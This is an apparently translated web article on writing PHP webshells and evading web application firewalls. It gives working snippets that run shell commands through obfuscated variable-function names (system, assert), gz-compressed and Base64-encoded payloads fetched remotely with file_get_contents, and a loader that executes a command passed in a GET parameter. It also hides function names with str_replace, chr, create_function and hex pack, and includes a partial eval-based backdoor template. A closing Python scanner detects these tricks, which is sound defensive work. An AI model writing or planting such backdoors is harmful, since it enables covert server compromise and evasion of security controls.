PHP Webshell Common functions

Source: Internet
Author: User
Tags: phpinfo

0x1

Appending parentheses to a variable that holds a function name as a string calls that function immediately:

<?php $s = 'system'; $e = 'assert'; $s('whoami'); $e('phpinfo();');

0x2

The functions commonly used to execute commands are:

system('command')
eval('PHP code')
assert('PHP code')

These three are the most commonly used.

0x3

base64_encode / base64_decode

<?php $b = base64_encode('whoami'); echo $b . '<br/>'; echo base64_decode($b) . '<br/>';

0x4

gzcompress / gzuncompress: compressing data

<?php $c = gzcompress('whoami'); echo $c . '<br/>'; echo gzuncompress($c) . '<br/>';

0x5

Combining the command-execution functions above with Base64 encoding and gz compression, a backdoor can be written as follows.

First compress the backdoor, then base64_encode the result (the Base64 step prevents encoding errors caused by raw binary characters).

If the backdoor is PHP code, it can finally be executed with assert or eval.

PHP has a function like this:

file_get_contents(URL)

This function fetches the contents of a remote file into a variable:

$shell = file_get_contents('http://localhost/shell.jpg');

Start testing, beginning with the simplest example.

Create a file encoded with gzcompress and base64_encode:

<?php
$c = 'system';
$data = gzcompress($c);
$file_data = base64_encode($data);
echo $file_data;
# The file name is an assumption, taken from the URL fetched in the next snippet.
fwrite(fopen('shell.txt', 'w'), $file_data);

This creates the string "system", compressed and then Base64 encoded.

Use:

<?php
$c = file_get_contents('http://localhost/shell.txt'); # Get data
$s = gzuncompress(base64_decode($c)); # Decode data
$s($_GET['session']); # Execute command

So the question is: why take such a roundabout route?

The reason is simple: once the data is compressed, some WAFs may not detect that the content is dangerous.

0x6

ASCII conversion functions: chr / ord

<?php
$str = 'system';
// Print each character of the string next to its ASCII code.
for ($count = 0; $count < strlen($str); $count++) {
    echo substr($str, $count, 1) . '~' . ord(substr($str, $count, 1)) . '<br/>';
}
/*
s~115
y~121
s~115
t~116
e~101
m~109
*/

0x7

str_replace, the character substitution function:

<?php
$s = str_replace('p', '', 'pspypsptpepmp');
echo $s;
# system

0x8

create_function() creates an anonymous function:

<?php
# create_function('parameter list', 'PHP code string');
$info = create_function('', 'phpinfo();');
$info();

0x9

pack function

pack('format', hex string)

The pack function is somewhat complicated and not commonly used. To convert a hexadecimal string back into characters, you can do this:

<?php $x = bin2hex('system'); $s = pack('H*', $x); echo $s . '<br/>'; $s('whoami');

The key use of pack is that sensitive function names can be converted to hexadecimal and then packed back.

For example, in create_function('', $shell), $shell is PHP code, and pack can be used to hide sensitive functions inside that code.

<?php
$shell = pack('H*', '2470617373776f72643d27') . $password        // "$password='"
       . pack('H*', '273b247368656c6c6e616d653d27') . $Username  // "';$shellname='"
       . pack('H*', '273b246d7975726c3d27') . $Url               // "';$myurl='"
       . pack('H*', '273b6576616c28677a756e636f6d7072657373286261736536345f6465636f64652827')  // "';eval(gzuncompress(base64_decode('"
       . '…
$f = create_function("

For pack usage, see: Perl pack

Summary

Create a gz-compressed, Base64-encoded file (such as logo.png) and fetch it with file_get_contents.

Use the str_replace / chr / ord / create_function functions to bypass some WAF detection.
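
For defenders, the tricks summarized above can be undone statically. The following Python code is an added example, not code from the original page: it resolves literal-only str_replace, pack('H*'), chr and base64_decode/gzuncompress expressions and flags variable-function calls that end in one of the sinks the page names. The names resolve, scan, SINKS, LIT, DECODERS and SAMPLE are hypothetical, the regex matching is a simplifying assumption rather than a real PHP parser, and the sample input is constructed from the page's snippets.

```python
import base64, re, zlib
SINKS = {"system", "eval", "assert", "create_function"}  # sinks the page names
LIT = r"""['"]([^'"]*)['"]"""                            # simple PHP string literal
DECODERS = {"base64_decode": base64.b64decode, "gzuncompress": zlib.decompress}

def resolve(expr):
    """Statically undo literal-only obfuscation; return the string or None."""
    expr = expr.strip()
    try:
        if m := re.fullmatch(LIT, expr):
            return m.group(1)
        if m := re.fullmatch(rf"(?i:str_replace)\(\s*{LIT}\s*,\s*{LIT}\s*,\s*{LIT}\s*\)", expr):
            return m.group(3).replace(m.group(1), m.group(2))
        if m := re.fullmatch(rf"(?i:pack)\(\s*['\"]H\*['\"]\s*,\s*{LIT}\s*\)", expr):
            return bytes.fromhex(m.group(1)).decode("latin-1")
        if re.fullmatch(r"(?i:chr\(\s*\d+\s*\)\s*\.?\s*)+", expr):
            return "".join(chr(int(n) % 256) for n in re.findall(r"\d+", expr))
        if m := re.fullmatch(r"(?i)(base64_decode|gzuncompress)\((.*)\)", expr):
            inner = resolve(m.group(2))
            if inner is not None:
                return DECODERS[m.group(1).lower()](inner.encode("latin-1")).decode("latin-1")
    except (ValueError, zlib.error):
        pass  # malformed hex, base64 or zlib data: treat as unresolved
    return None

def scan(source):
    """Return sorted (line, rule, detail) findings for one PHP source text."""
    found, exprs = set(), {}
    for no, line in enumerate(source.splitlines(), 1):
        found |= {(no, "direct-sink", f.lower())
                  for f in re.findall(r"(?<![\w$])(\w+)\s*\(", line) if f.lower() in SINKS}
        if re.search(r"(?i)file_get_contents\s*\(\s*['\"]https?://", line):
            found.add((no, "remote-fetch", "file_get_contents"))
        exprs.update(re.findall(r"(\$\w+)\s*=\s*([^;]+);", line))  # last assignment wins
        for var in re.findall(r"(\$\w+)\s*\(", line):              # variable-function calls
            expr = exprs.get(var, "")
            name = (resolve(expr) or "").lower()
            if name in SINKS:
                found.add((no, "hidden-sink", f"{var} -> {name}"))
            elif re.search(r"(?i)base64_decode|gzuncompress|file_get_contents", expr):
                found.add((no, "opaque-call", var))
    return sorted(found)

# Constructed sample assembled from the page's snippets, not a real capture.
SAMPLE = """<?php
$b = str_replace('p', '', 'pspypsptpepmp'); $b('whoami');
$c = pack('H*', '73797374656d'); $c('whoami');
$d = chr(97).chr(115).chr(115).chr(101).chr(114).chr(116); $d('phpinfo();');
$e = file_get_contents('http://localhost/shell.txt'); $f = gzuncompress(base64_decode($e)); $f($_GET['session']);
"""
```

Calling scan(SAMPLE) reports a hidden-sink finding for each obfuscated function name, plus remote-fetch and opaque-call for the callable loaded from the remote file.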
